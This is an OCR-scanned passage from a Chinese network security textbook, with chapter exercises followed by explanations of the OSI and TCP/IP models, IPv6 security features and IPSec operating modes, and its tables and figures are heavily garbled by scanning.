(1) 应 用 软件 的 漏洞 属于 网 络 系统 ( 。 )。 
A. 操作 系统 的 脆弱 性 B. 计算 机 系统 的 脆弱 性 
C. 数据 库 系 统 的 脆弱 性 D. 网 络 通信 的 脆弱 性 
(2) 审计 跟踪 属于 ( )。 
A. 实体 安全 B. 运行 安全 
C. 系统 安全 D. 应 用 安全 
(3) ( ”) 风 险 评 估 方 法 属于 定量 分 析 法 。 
A. 聚 类 分 析 法 B. SCL 
CG BLA D. 危险 度 评价 法 
3. 判断 题 
(1) 主动 攻击 包括 拒绝 服务 攻击 、 信 息 纂 改 、 资 源 使 用 和 欺骗 等 攻击 方法 。 (  ) 
(2) 网 络 没有 绝对 的 安全 ， 只 要 联网 就 存在 威胁 。 C3 
(3) 网 络 机 房 应 尽量 采用 水 冷 式 空调 ， 制 冷 效果 好 。 | 
4. 简 答题 


(1) 网 络 系统 的 脆弱 性 表现 在 哪些 方面 ? 
(2) 网 络 安全 的 发 展 趋势 有 哪些 ? 

(3) 网 络 安全 的 研究 内 容 有 哪些 ? 

(4) 简 述 网 络 安全 防护 技术 及 其 内 容 。 

(5) 应 该 从 哪些 方面 保障 网 络 机 房 的 安全 ? 
(6) 简 述 网 络 安全 风险 评估 的 环节 及 其 内 容 。 


计算 机 技术 正在 日 新 月 异地 迅猛 发 展 ， 功 能 强大 的 计算 机 和 
Intranet/Internet 正在 世界 范围 内 普及 。 信 息 化 和 网 络 化 是 当今 世界 
经 济 与 社会 发 展 的 大 趋势 ， 信 息 资源 的 深入 开发 利用 以 及 各 行 各 业 
的 信息 化 、 网 络 化 已 经 迅速 展开 ; 全 社会 广泛 应 用 信息 技术 ， 计 算 
机 网 络 广泛 应 用 为 人 们 所 关注 。 面 对 当前 严重 危害 计算 机 网 络 的 种 
种 威胁 ， 必 须 采取 有 力 的 措施 来 保证 计算 机 网 络 的 安全 


的 计算 机 网 络 大 多 数 在 建立 之 初 都 忽略 了 安全 问题 
全 ， 也 仅 把 安全 机 制 建立 在 物理 安全 机 制 上 。 本 章 
络 安全 体系 的 含义 以 及 其 安全 机 制 ， 并 对 当前 网 络 
些 内 容 做 了 介绍 。 
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2.1 网 络 安全 体系 结构 


计算 机 网 络 安全 体系 结构 是 网 络 安全 最 高 层 的 抽象 描述 ， 在 大 规模 的 网 络 工程 建设 与 
管理 和 网 络 安全 系统 设计 开发 的 过 程 中 ， 需 要 从 全 局 的 体系 结构 和 考虑 安全 问题 的 整体 解 
决 方案 角度 出 发 ， 才 能 保证 网 络 安全 功能 的 完备 性 与 一 致 性 ， 降 低 安全 的 风险 、 代 价 和 管 
理 的 费用 。 因 此 ， 安 全 体系 结构 对 于 网 络 安全 的 理解 、 设 计 、 实 现 与 管理 都 具有 重大 


2.1.1 开放 系统 互 连 参考 模型 


OSIRM(Open System Interconnection Reference Model) 开 放 系 统 互 连 参 考 模型 7 层 协 
议 的 主要 功能 如 表 2-1 所 示 。 


表 2-1 OSI/RM 的 主要 功能 


层次 名 称 主要 功能 功能 概述 应 用 样 例 
应 用 层 具体 应 用 功能 ， | 提供 (OSD 用 户 服务 ， 如 文件 传输 、 a 
解决 做 什么 电子 邮件 、 网 络 管理 等 
8 表示 层 表示 、 表 达 、 解 | 实现 不 同 格式 和 编码 之 间 的 交换 ， | ASCI、JPEG、 
决 像 什么 传递 数据 的 语法 及 语义 EBCDIC 
在 两 个 应 用 进程 之 间 建立 和 管理 不 
8 会 话 层 如 何 检查 ? 对 方 | 同形 式 的 通信 对 话 。 其 数据 流 方向 | 操作 系统 、 应 用 
是 谁 控制 有 三 种 ， 即 单 工 、 半 双 工 、 | 访问 规划 
双 工 
提供 传递 方式 ， 进 行 多 路 利用 ， 实 二 
4 传输 层 对 方 在 何 处 现 端点 间 的 数据 交换 、 为 会 话 层 实 Sp 
现 提供 透明 的 、 可 靠 的 数据 传输 服务 
通过 分 组 交换 和 路 由 选择 为 传输 层 
，，| 实体 提供 端 到 端的 交换 网 络 数据 ， 
3 网 络 层 sg 传送 功能 使 得 传输 层 摆脱 路 由 选 | 也、IPX 
择 、 交 换 方式 、 拥 挤 控制 等 网 络 传 
输 细节 ， 实 现 数据 传输 
进行 二 进 制 数 据 块 传送 ， 并 进行 差 
每 一 步 应 该 怎样 | 错 检测 和 数据 流 控制 。 它 分 为 两 个 | 802.3/802.2、 
| 证 子 层 ， 即 介质 访问 控制 协议 MAC) | HDLC 
和 逻辑 链 路 控制 协议 (LLC) 
对 二 一 层 的 每 一 | 通过 机 械 和 电气 互联 方式 把 实体 连 | EIARS232， 
1 物理 层 步 如 何 利用 物理 接 起 来 ， 让 数据 流通 过 10Base2、 
传输 介质 传送 10Base5 
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2.1.2 Internet 网 络 体系 层次 结构 

Internet 目前 使 用 的 协议 是 TCP/IP 协议 。TCP/IP 协议 是 一 个 4 层 结构 的 集 网 络 通信 、 
应 用 、 服 务 、 管 理 等 多 种 功能 的 协议 族 ， 这 4 层 协 议 分 别 是 物理 网 络 接口 层 协 议 、 网 际 层 
协议 、 传 输 层 协议 和 应 用 层 协议 。 

TCP/IP 族 的 4 层 协议 与 OSI 参考 模型 的 7 层 协议 和 常用 协议 的 对 应 关系 如 图 2-1 


所 示 。 
OSI 模型 TCP/IP 模型 


应 用 层 
TCP/P 协议 组 


表示 层 应 用 层 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 


数据 链 路 层 


RS 1 1 和 
0 区 1 1 
物理 层 Ld LE LE | 


图 2-1 TCP/IP 协议 与 OSI 协议 和 常用 协议 的 对 应 关系 


网 络 系统 的 技术 安全 性 可 以 通过 对 网 络 系统 中 受 保护 对 象 的 保护 措施 进行 保护 。 可 以 
将 网 络 系统 安全 管理 框架 作为 各 种 适合 特定 业务 需求 或 管理 需求 的 安全 技术 手段 ， 分 门 别 
类 地 应 用 到 网 络 安全 受 保护 对 象 的 各 个 层次 中 ， 从 技术 的 角度 有 效 地 支撑 网 络 安全 运作 体 
系 ， 达 到 切实 有 效 地 保障 网 络 安全 的 目的 。 


2.1.3 网络 安 全 层次 特征 体系 

为 了 更 好 地 理解 网 络 安全 层次 特征 体系 ， 可 以 将 计算 机 网 络 安全 看 成 一 个 由 多 个 安全 
单元 组 成 的 集合 ， 每 一 个 安全 单元 都 是 一 个 整体 ， 包 含 了 多 个 特性 。 可 以 从 安全 特性 的 安 
全 问题 、 系 统 单元 的 安全 问题 和 开放 系统 互 连 参 考 模型 结构 层次 的 安全 问题 这 3 个 主要 
特性 来 理解 一 个 安全 单元 。 所 以 ， 安 全 单元 集合 可 以 用 一 个 三 维 的 安全 空间 进行 描述 ， 如 
图 2-2 所 示 。 
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1. 安全 特性 的 安全 问题 


安全 特性 是 指 该 单元 能 解决 的 具体 安全 威胁 。 计 算 机 网 络 的 安全 威胁 主要 关心 人 的 恶 
意 行为 可 能 导致 的 资源 被 破坏 、 信 息 泄 露 、 自 改 、 滥 用 和 拒绝 服务 ， 其 中 的 资源 主要 包括 
信息 资源 、 计 算 资 源 、 通 信 资 源 等 。 


OSI 参考 模型 的 结构 层次 


物理 环境 的 安全 问题 


网 络 系统 本 身 的 安全 问题 
应 用 系统 的 安全 问题 
网 络 管理 的 安全 问题 


系统 单元 的 安全 问题 


图 2-2 网 络 安全 层次 特征 体系 结构 
2. OSI 参考 模型 的 安全 问题 


OSI 参考 模型 的 安全 问题 主要 指 OSI 参考 模型 的 各 层 都 存在 着 不 同 的 安全 漏洞 和 
隐患 。 


3. 系统 单元 的 安全 问题 


系统 单元 的 安全 问题 是 指 该 安全 单元 解决 指定 系统 环境 的 安全 问题 。 对 于 Intemet， 
可 以 从 4 个 不 同 的 环境 来 分 析 其 安全 问题 。 


4. 物理 环境 的 安全 问题 
物理 环境 的 安全 问题 主要 包括 该 特性 的 安全 单元 解决 物理 环境 的 安全 问题 。 
5. 网 络 系 统 本 身 的 安全 问题 


网 络 系统 本 身 的 安全 问题 主要 指数 据 在 网 络 上 传输 的 安全 威胁 。 例 如 ， 加 密 技术 可 以 
解决 数据 在 网 络 传输 过 程 中 的 安全 问题 。“ 系 统 ”主要 指 的 是 操作 系统 ， 它 包含 该 特性 的 
安全 单元 解决 端 系统 或 者 中 间 系 统 (网 桥 、 路 由 器 等 ) 的 操作 系统 包含 的 安全 问题 。 一 般 是 
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指数 据 和 资源 在 存储 时 的 安全 威胁 。 
6. 应 用 系统 的 安全 问题 


应 用 系统 的 安全 问题 主要 指 该 特性 的 安全 单元 解决 应 用 程序 所 包含 的 安全 问题 。 一 般 
是 指数 据 在 操作 及 资源 使 用 时 遇 到 的 安全 威胁 。 


7. 网 络 管理 的 安全 问题 


网 络 管理 的 安全 问题 主要 包括 安全 域 的 设置 和 管理 、 安 全 管理 信息 库 、 安 全 管理 信息 
的 通信 、 安 全 管理 应 用 程序 协议 及 安全 机 制 与 服务 管理 。 
以 上 涉及 的 具体 内 容 将 在 后 续 章节 中 详细 介绍 。 


2.1.4 1IPv6 的 安全 性 


IPv6 是 Internet Protocol version 6 的 缩写 ， 也 被 称 作 下 一 代 互 联网 协议 ， 它 是 由 
IETF( 互 联网 工程 任务 组 ) 设 计 的 用 来 代替 现行 的 IPv4 协议 的 一 种 新 的 IP 协议 。 今 天 的 互 
联网 大 多 数 应 用 的 是 IPv4 协议 ，IPv4 协议 已 经 使 用 了 20 多 年 。IPv4 获得 了 巨大 的 成 
功 ， 同 时 随 着 应 用 范围 的 扩大 ， 它 也 面临 着 越 来 越 不 容 忽视 的 危机 ， 如 地 址 匮乏 等 。IPv6 
是 为 了 解决 IPv4 存在 的 一 些 问题 和 不 足 而 提出 的 ， 同 时 它 还 在 许多 方面 提出 了 改进 ， 如 
路 由 、 自 动 配置 方面 。 经 过 一 个 较 长 的 IPv4 和 IPv6 共存 的 时 期 ，IPv6 最 终 会 完全 取代 
IPv4， 在 互联 网 上 占据 统治 地 位 。 对 比 IPv4，IPv6 有 如 下 特点 ， 这 些 特点 也 可 以 说 是 
IPv6 的 优点 : 简化 的 报头 和 灵活 的 扩展 、 层 次 化 的 地 址 结构 、 即 插 即 用 的 联网 方式 、 网 络 
层 的 认证 与 加 密 、 服 务 质量 的 满足 、 对 移动 通信 更 好 的 支持 。 


1. IPv6 概述 


相对 于 IPv4，IPv6 有 如 下 一 些 显 著 的 优势 : 

(1) 地 址 容量 大 大 扩展 ， 由 原来 的 32 位 扩充 到 128 位 ， 彻 底 解决 IPv4 地 址 不 足 的 问 
题 ; 支持 分 层 地 址 结构 ， 从 而 更 易于 寻 址 ; 扩展 支持 组 播 和 任 播 地 址 ， 这 使 得 数据 包 可 以 
发 送 给 任何 一 个 或 一 组 节点 。 

(2) 大 容量 的 地 址 空间 能 够 真正 地 实现 无 状态 地 址 自动 配置 ， 使 IPv6 终端 能 够 快速 
链接 到 网 络 上 ， 无 须 人 工 配置 ， 实 现 了 真正 的 即 插 即 用 。 

(3) 报头 格式 大 大 简化 ， 从 而 有 效 减少 路 由 器 或 交换 机 对 报头 的 处 理 开销 ， 这 对 设计 
硬件 报头 处 理 的 路 由 器 或 交换 机 十 分 有 利 。 

(4) 加 强 了 对 扩展 报头 和 选项 部 分 的 支持 ， 这 除了 让 转发 更 为 有 效 外 ， 还 将 对 将 来 网 
络 加 载 的 应 用 提供 充分 的 支持 。 

(5) 流标 签 的 使 用 可 以 为 数据 包 所 属 类 型 提供 个 性 化 的 网 络 服 务 ， 并 有 效 保障 相关 业 
务 的 服务 质量 。 

(6) 认证 与 私密 性 ，IPv6 把 IPSec 作为 必 备 协议 ， 保 证 了 网 络 层 端 到 端 通信 的 完整 性 
和 机 密 性 。 

(7) IPv6 在 移动 网 络 和 实时 通信 方面 有 很 多 改进 。 不 像 IPv4，IPv6 具备 强大 的 自动 
配置 能 力 ， 从 而 简化 了 移动 主机 和 局 域 网 的 系统 管理 。 
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新 的 IPv6 报头 的 结构 比 IPv4 简单 得 多 ，IPv6 报头 中 删除 了 IPv4 报头 中 不 常用 的 
域 ， 放 入 了 可 选项 和 报头 扩展 中 ; IPv6 中 只 有 6 个 域 和 两 个 地 址 空间 。 虽 然 IPv6 报头 占 
40 字 节 ， 是 24 字 节 IPv4 报头 的 1.6 倍 ， 但 因 其 长 度 固定 (Pv4 报头 是 变 长 的 )， 故 不 需要 
消耗 过 多 的 内 存 容 量 。IPv4 中 的 报头 长 度 (Header Length)、 服 务 类 型 (Type Of Service， 
TOS)、 标 识 符 (Identification)、 标 志 (Flag)、 分 段 偏 移 (Fragment Offset) 和 报头 校 验 (Header 
Checksum) 这 6 个 域 被 删除 。 报 文 总 长 (Total Length)、 协 议 类 型 (Protocol Type) 和 生存 时 间 
(Time To Live，TTL)3 个 域名 或 部 分 功能 被 改变 ， 其 选项 (Options) 功 能 完全 被 改变 ， 新 增 
加 了 两 个 域 ， 即 优先 级 和 流标 签 。 

有 些 人 也 许 要 问 ，IPv4 地 址 不 够 用 ， 那 我 在 IPv4 上 再 增加 几 位 地 址 表示 就 行 了 ， 何 
必 非 要 使 用 IPv6 的 128 位 呢 ? 这 种 提问 是 对 芯片 设计 及 CPU 处 理 方式 不 理解 造成 的 ， 同 
时 也 对 未 来 网 络 的 扩展 没有 充分 的 预见 性 。 芯 片 设计 中 数值 的 表示 是 全 用 “0”、“1” 代 
表 ，CPU 处 理 字 长 发 展 到 现在 分 别 经 历 了 4 位 、8 位 、16 位 、32 位 、64 位 等 ， 在 计算 机 
中 ， 当 数据 能 用 2 的 指数 次 寡 字 长 位 的 二 进 制 数 表示 时 ，CPU 对 数值 的 处 理 效率 最 高 。 
IPv4 地 址 对 应 的 是 32 位 字 长 就 是 因为 当时 的 互联 网 上 的 主机 CPU 字 长 为 32 位 。 现 在 的 
64 位 机 已 十 分 普及 ，128 位 机 正在 成 长 中 。 将 地 址 定 为 128 位 是 十 分 合适 的 。 

IPv6 提供 128 位 的 地 址 空间 ，IPv6 所 能 提供 的 巨大 地 址 容量 可 以 从 以 下 几 个 方面 来 
说 明 : 共有 2” 个 不 同 的 IPv6 地 址 ， 也 就 是 全 球 可 分 配 地 址 数 为 
340 282 366 920 938 463 463 374 607 431 768 211 456 个 ; 车 按 土地 面积 分 配 ， 每 平方 厘米 
可 获得 2.2x10” 个 地 址 。IPv6 地 址 耗 尽 的 机 会 是 很 小 的 。 在 可 预见 的 很 长 时 期 内 ，IPv6 
的 128 位 地 址 长 度 形成 的 巨大 的 地 址 空间 将 极 大 地 满足 那些 伴随 着 网 络 智能 设备 的 出 现 而 
对 地 址 增长 的 需求 ， 如 个 人 数据 助理 (PAD)、 移 动 电话 (Mobile Phone)、 家 庭 网 络 接 入 设备 
(HAN) 等 。 

IPv4 地 址 表示 为 点 分 十 进 制 格式 ，32 位 的 地 址 分 成 4 个 8 位 分 组 ， 每 个 8 位 写成 十 
进 制 ， 中 间 用 点 号 分 隔 。 而 IPv6 的 128 位 地 址 则 是 以 16 位 为 一 分 组 ， 每 个 16 位 分 组 写 
成 4 个 十 六 进 制 数 ， 中 间 用 冒号 分 隔 ， 称 为 冒号 分 十 六 进 制 格式 。 如 
21DA:00D3:0000:02AA:00FF:FE28:9C5A 是 一 个 完整 的 IPv6 地 址 。 在 IPv4 中 ， 地 址 是 用 
户 拥 有 的 。 也 就 是 说 一 旦 用 户 从 某 机 构 处 申请 到 一 段 地 址 空间 ， 他 就 永远 使 用 该 地 址 空 
间 ， 而 不 管 他 是 从 哪个 因特网 服务 提供 者 (ISP) 处 获得 服务 。 这 种 方式 的 缺点 是 ISP 必须 在 
路 由 表 中 为 每 个 用 户 的 网 络 号 维护 一 条 表 项 。 随 着 用 户 数量 的 增加 ， 会 出 现 大 量 无 法 会 聚 
的 特殊 路 由 ， 即 使 CIDR 也 不 能 处 理 这 样 的 路 由 表 爆 炸 现 象 。IPv6 改变 了 地 址 的 分 配方 
式 ， 从 用 户 拥有 变 成 了 ISP 拥有 。 全 球 网 络 号 由 因特网 地 址 分 配 机 构 (LANA) 分 配给 ISP， 
用 户 的 全 球 网 络 地 址 是 ISP 地 址 空间 的 子 集 。 每 当 用 户 改变 ISP 时 ， 全 球 网 络 地 址 必须 更 
新 为 新 ISP 提供 的 地 址 。 这 样 ISP 能 有 效 地 控制 路 由 信息 ， 避 免 路 由 爆炸 现象 的 出 现 。 通 
常 一 台 IPv6 主机 有 多 个 IPv6 地 址 ， 即 使 该 主机 只 有 一 个 单 接口 。 一 台 IPv6 主机 可 同时 
拥有 以 下 几 种 单 点 传送 地 址 : 每 个 接口 的 链 路 本 地 地 址 、 每 个 接口 的 单 播 地 址 (可 以 是 一 
个 站 点 本 地 地 址 和 一 个 或 多 个 可 聚集 全 球 地 址 )、 回 环 (Loopback) 接 口 的 回环 地 址 。IPvV6 定 
义 了 邻居 发 现 协 议 (Neighbor Discovery Protocol，NDP)， 它 使 用 一 系列 IPv6 控制 信息 报 文 
(ICMPv6) 来 实现 相 邻 节点 (同一 链 路 上 的 节点 ) 的 交互 管理 ， 并 在 一 个 子 网 中 保持 网 络 层 地 
址 之 间 的 映射 。 邻 居 发 现 协议 中 定义 了 5 种 类 型 的 信息 : 路 由 器 通告 (Router 
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Advertisement) 、 路 由 器 请 求 Router Solicitation)、 路 由 重 定向 (Redirect)、 邻 居 请 求 
(Neighbor Solicitation) 和 邻居 通告 (Neighbor Advertisement) 。IPv6 不 再 执行 地 址 解析 协议 
(ARP) 或 反 向 地 址 解析 协议 RARP)， 而 以 邻居 发 现 协议 中 的 相应 功能 代替 。IPv6 邻居 发 现 
协议 与 IPv4 地 址 解析 协议 主要 区 别 如 下 : GDIPv4 的 地 址 解析 协议 ARP 是 独立 的 协议 ， 负 
责 IP 地 址 到 链 路 层 地 址 的 转换 ， 对 不 同 的 链 路 层 协议 要 定义 不 同 的 ARP 协议 。IPv6 的 邻 
居 发 现 协议 NDP 包含 了 ARP 的 功能 ， 且 运行 于 因特网 控制 报 文 协议 ICMPv6 上 ， 更 具有 
一 般 性 ， 包 括 更 多 内 容 ， 而 且 适 用 于 各 种 链 路 层 协议 。@ARP 协议 以 及 ICMPv4 路 由 器 发 
现 和 ICMPv4 重 定向 报 文 基于 广播 ， 而 NDP 协议 的 邻居 发 现 报 文 基于 高 效 的 组 播 和 单 
播 。@ 可 达 性 检测 的 目的 是 确认 相应 IP 地 址 代表 的 主机 或 路 由 器 是 否 还 能 收发 报 文 ， 

IPv4 没有 统一 的 解决 方案 ; NDP 中 定义 了 可 达 性 检测 过 程 ， 保 证 IP 报 文 不 会 发 送 给 

2. IPv6 安全 性 分 析 


原来 的 互联 网 安全 机 制 只 建立 于 应 用 程序 级 ， 如 E-mail 加 密 、SNMPv2 网 络 管理 安 
全 、 接 入 安全 (HTTP、SSL) 等 ， 无 法 从 IP 层 来 保证 Internet 的 安全 。 为 了 加 强 互 联网 的 安 
全 性 ， 从 1995 年 开始 ，IETF 着 手 研究 制定 了 一 套 IP 安全 性 机 制 ， 它 是 IPv6 的 一 个 组 成 
部 分 ， 也 是 IPv4 的 一 个 可 选 扩展 协议 。 通 过 集成 IPSec，IPv6 实现 了 IP 级 的 安全 。IPSec 
提供 如 下 安全 性 服务 : 访问 控制 、 无 连接 的 完整 性 、 数 据 源 身份 认证 、 防 御 包 重 传 攻击 、 
保密 、 有 限 的 业务 流 保密 性 。IPSec 的 认证 报头 (Authentication Header，AH，RFC 2402 中 
描述 ) 协 议定 义 了 认证 的 应 用 方法 ;封装 安全 负载 (Encapsulating Security Payload，ESP， 
RFC 2406 中 描述 ) 协 议定 义 了 加 密 和 可 选 认 证 的 应 用 方法 。IPSec 安全 性 服务 完全 通过 AH 
和 ESP 头 相 结合 的 机 制 来 提供 ， 当 然 还 要 有 正确 的 相关 密 钥 管理 协议 。 在 实际 进行 P 通 
信 时 ， 可 以 根据 安全 需求 同时 使 用 这 两 种 协议 或 选择 使 用 其 中 的 一 种 。IPv6 实质 上 不 会 比 
IPv4 更 安全 。IPv6 标准 的 起 草 者 、 思 科 公 司 总 部 的 两 位 杰出 网 络 技术 领袖 Fred Baker 和 
Tony Hain 认为 IPv6 从 根本 上 来 说 ， 只 是 IP 地 址 改变 的 协议 包 ， 并 不 能 解决 现在 的 互联 
网 协议 IPv4 中 的 安全 问题 。 但 是 由 于 IPSec 提供 的 端 到 端 安全 性 的 两 个 基本 组 件 一 一 认证 
和 加 密 都 是 IPv6 协议 的 必 备 组 件 ， 而 在 IPv4 中 ， 它 们 只 是 可 选 组 件 ， 因 此 ， 采 用 IPv6 
协议 时 安全 性 会 更 加 简便 、 一 致 。 更 重要 的 是 ，IPv6 使 人 们 有 机 会 在 将 网 络 转换 到 这 种 新 
型 协议 的 同时 发 展 端 到 端 安全 性 。 

IPv6 网 络 中 仍 需 要 使 用 防火 墙 、 入 侵 检 测 系统 等 传统 的 安全 设备 ， 但 由 于 IPv6 的 一 
些 新 特点 ，IPv4 网 中 现 有 的 这 些 安全 设备 在 IPv6 网 中 不 能 直接 使 用 ， 还 需要 做 以 下 
改进 。 

(1) 防火 墙 的 设计 : 由 于 IPv6 相对 IPv4 在 数据 报头 上 有 了 很 大 的 改变 ， 所 以 原来 的 
防火 墙 产品 在 IPv6 网 络 上 不 能 直接 使 用 ， 必 须 做 一 些 改进 。 针 对 IPv6 的 Socket 套 接口 函 
数 已 经 在 RFC3493 中 的 Basic Socket Interface Extensions for IPv6 中 定义 ， 以 前 的 应 用 程序 
都 必须 参考 新 的 API 做 相应 的 改动 。IPv4 中 的 防火 墙 过 滤 的 依据 是 人 P 地 址 和 TCP/UDP 
端口 号 。IPv4 中 IP 头 部 和 TCP 头 部 是 紧 接 在 一 起 的 ， 而 且 其 长 度 是 固定 的 ， 所 以 防火 墙 
很 容易 找到 头 部 ， 并 应 用 相应 的 策略 。 然 而 在 IPv6 中 TCP/UDP 报头 的 位 置 有 了 根本 的 变 
化 ， 它 们 不 再 是 紧 连 在 一 起 的 ， 通 常 中 间 还 间隔 有 其 他 的 扩展 头 部 ， 如 路 由 选项 头 部 、 
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AH/ESP 头 部 等 。 防 火 墙 必须 读 懂 整 个 数据 包 才能 进行 过 滤 操 作 ， 这 对 防火 墙 的 处 理性 能 
会 有 很 大 的 影响 。 

(2) 入 侵 检 测 系统 (IDS) 的 设计 : 在 IPv6 下 也 使 我 们 不 得 不 放弃 以 往 的 网 络 监控 技 
术 ， 投 身 一 个 全 新 的 研究 领域 。 首 先 ，IDS 产品 同 防火 墙 一 样 ， 在 IPv6 下 不 能 直接 运 
行 ， 还 要 做 相应 的 修改 。 其 次 ，IDS 的 工作 原理 实际 上 是 一 个 监听 器 ， 接 收 网 段 上 的 所 有 
数据 包 ， 并 对 其 进行 分 析 ， 从 而 发 现 攻 击 并 实施 相应 的 报警 措施 。 但 是 ， 如 果 使 用 传输 模 
式 进行 端 到 端的 加 密 ，IDS 就 无 法 工作 ， 因 为 它 接收 的 是 加 密 的 数据 包 ， 无 法 理解 。 当 
然 ， 解 决 方案 之 一 是 让 IDS 能 对 这 些 数据 包 进 行 解 密 ， 但 这 样 势必 会 带 来 新 的 安全 问题 。 
同时 IPv6 的 可 靠 性 是 否 如 最 初 所 设想 的 那样 ， 也 有 待 时 间 的 考验 。 由 于 IPv6 中 引入 了 网 
络 层 的 加 密 技 术 ， 未 来 网 络 上 的 数据 通信 的 保密 性 将 会 越 来 越 强 ， 这 使 网 络 入 侵 检 测 系统 
和 主机 入 侵 检测 引擎 也 面临 在 多 种 不 同 平台 如 何 部 署 的 问题 。 这 就 需要 研究 IDS 新 的 部 署 
方式 ， 再 下 一 步 ， 研 究 如 何 才 能 在 任何 网 络 状况 、 任 何 服务 器 、 任 何 客户 端 、 任 何 应 用 环 
境 都 能 进行 适当 的 自转 换 和 自 适 应 。 


2.2 ”网络 协议 安全 分 析 


计算 机 网 络 互 连 使 得 网 络 通信 和 信息 共享 变 得 更 为 便捷 ， 同 时 也 将 开放 的 系统 暴露 在 
易 受 攻击 的 环境 中 。 

TCP/IP 的 安全 脆弱 性 大 致 可 归结 为 以 下 3 点 : 

(1) 无 验证 通信 双方 真实 性 的 能 力 ， 缺 乏 有 效 的 认证 机 制 。 

(2) 无 保护 网 上 数据 隐私 性 的 能 力 ， 缺 乏 保密 机 制 。 

(3) 协议 自身 设计 细节 和 实现 中 存在 一 些 安全 漏洞 ， 容 易 引 发 各 种 安全 攻击 。 


2.2.1 物理 层 安 全 


物理 层 安全 威胁 主要 指 网 络 环境 和 物理 特性 引起 的 网 络 设备 和 线路 的 不 可 用 而 造成 的 
网 络 系统 的 不 可 用 ， 如 设备 被 盗 、 意 外 故障 、 设 备 损 毁 与 老化 、 信 息 探测 与 窃听 等 。 由 于 
以 太 网 中 采用 广播 方式 ， 因 此 ， 在 某 个 广播 域 中 利用 嗅 探 器 可 以 在 设 定 的 端口 侦 听 和 分 析 
信息 包 ， 致 使 本 广播 域 的 信息 传递 暴露 无 遗 。 所 以 需 将 两 个 网 络 从 物理 上 隔断 ， 同 时 保证 
在 逻辑 上 两 个 网 络 能 够 连通 。 物 理 层 安 全 措施 相对 较 少 。 


2.2.2 ”网 络 层 安全 


IPv4 的 瑟 地 址 是 TCP/IP 网 络 中 唯一 指定 主机 的 32 位 地 址 ， 一 个 PP 包头 占 20 字 
节 ， 包 括 瑟 版 本 号 、 长 度 、 服 务 类 型 和 其 他 配置 信息 及 控制 字段 。 

大 型 网 络 系统 内 一 般 会 运行 多 种 网 络 协议 (TCP/IP、IPX/SPX 和 NETBEUI 等 )。 IP 协 
议 维 系 着 整个 TCP/IP 协议 的 体系 结构 ， 除 了 数据 链 路 层 外 ，TCP/IP 所 有 协议 的 数据 都 以 
IP 数据 报 的 形式 传输 ，TCP/IP 协议 族 有 两 种 卫 版 本 : IPv4 和 Pv6。IPv6 简化 了 卫 头 ， 
其 数据 报 更 加 灵活 ， 同 时 IPv6 还 增加 了 安全 性 的 设计 。 
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JIPv4 在 设计 之 初 并 没有 考虑 安全 性 ，IP 包 本 身 并 不 具有 任何 安全 特性 ， 从 而 导致 在 
网 络 上 传输 的 数据 很 容易 受到 各 种 攻击 ， 因 此 ， 通 信 双 方 不 能 保证 收 到 卫 数据 报 的 真 
实 性 。 

网 络 层 的 安全 威胁 主要 有 两 类 : IP 欺骗 和 ICMP( 因 特 网 控制 信息 协议 ) 攻 击 。 

IPSec(Imnternet 协议 安全 ) 是 一 个 工业 标准 网 络 安全 协议 ， 为 IP 网 络 通信 提供 了 透明 的 
安全 服务 ， 保 护 TCP/IP 通信 和 免 遭 窃听 和 算 改 ， 可 以 有 效 抵御 网 络 攻击 ， 同 时 保持 易 用 
性 。IPSec 在 TCP/IP 协议 栈 中 所 处 的 层次 如 图 2-3 所 示 。 

众所周知 ， 网 络 攻击 常常 可 能 导致 系统 衣 溃 以 及 敏感 数据 的 外 泄 ， 因 此 数据 资源 必须 
受到 足够 的 保护 ， 以 防 被 侦 听 、 自 改 或 非法 访问 。 常 规 网 络 保护 策略 有 使 用 防火 墙 、 安 全 
路 由 器 (安全 网 关 ) 以 及 对 拨号 用 户 进行 身份 认证 等 。 这 些 措施 通常 被 称 为 “边界 保护 ”， 
往往 只 着 重 于 抵御 来 自 网 络 外 部 的 攻击 ， 但 不 能 阻止 网 络 内 部 的 攻击 行为 。 还 有 一 种 比较 
少见 的 保护 策略 是 物理 级 保护 ， 就 是 保护 实际 的 网 络 线路 和 网 络 访问 的 节点 ， 禁 止 任何 未 
经 授权 的 使 用 。 但 这 种 保护 方式 ， 当 数据 需要 从 数据 源 通过 网 络 传输 到 目的 地 时 ， 无 法 保 
证 数据 的 全 程 安全 。 


图 2-3 IPSec 在 TCP/IP 协议 栈 中 所 处 的 层次 


因此 ， 使 用 IPSec 协议 有 两 个 原因 。 一 个 是 原来 的 TCP/IP 体系 中 ， 没 有 包括 基于 安 
全 的 设计 ， 任 何人 ， 只 要 能 够 拱 入 线路 ， 即 可 分 析 所 有 的 通信 数据 。IPSec 引进 了 完整 的 
安全 机 制 ， 包 括 加 密 、 认 证 和 防 数据 算 改 功能 。 另 一 个 原因 ， 是 因为 Intemet 迅速 发 展 ， 
接 入 越 来 越 方便 ， 很 多 客户 希望 能 够 利用 这 种 上 网 的 带宽 ， 实 现 异地 网 络 的 互通 。IPSec 
协议 通过 包 封装 技术 ， 能 够 利用 Intemet 可 路 由 的 地 址 ， 封 装 内 部 网 络 的 瑟 地址 ， 实 现 异 
地 网 络 的 互通 。 

IPSec 采用 端 对 端 加 密 模 式 ， 其 基本 工作 原理 是 : 发 送 方 在 数据 传输 前 ( 即 到 达 网 线 之 
前 ) 对 数据 实施 加 密 ， 在 整个 传输 过 程 中 ， 报 文 都 是 以 密 文 方式 传输 ， 直 到 数据 到 达 目 的 
节点 ， 才 由 接收 端 对 其 进行 解密 。IPSec 对 数据 的 加 密 以 数据 包 而 不 是 整个 数据 流 为 单 
位 ， 这 不 仅 更 灵活 ， 也 有 助 于 进一步 提高 卫 数据 包 的 安全 性 。 通 过 提供 强 有 力 的 加 密 保 
护 ，IPSec 可 以 有 效 防 范 网 络 攻击 ， 保 证 专用 数据 在 公共 网 络 环境 下 的 安全 性 。 

IPSec 有 两 种 工作 模式 : 传输 模式 和 隧道 模式 ， 如 图 2-4 所 示 。 传 输 模式 用 于 两 台 主 
机 之 间 ， 保 护 传输 层 协议 头 ， 实 现 端 对 端的 安全 性 ;隧道 模式 用 于 主机 与 路 由 器 之 间 ， 保 
护 整个 卫 数据 包 。 
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原始 IP 包 IP 头 TCP 头 数 据 | 
传输 模式 IP 头 IPSee 头 TCP 头 | 数据 | 
隧道 模式 | 外 部 IP 头 IPSec 头 | 内 部 IP 头 TCP 头 | 数据 


图 2-4 IPSec 的 两 种 工作 模式 
1. IPSec 协议 的 安全 特征 


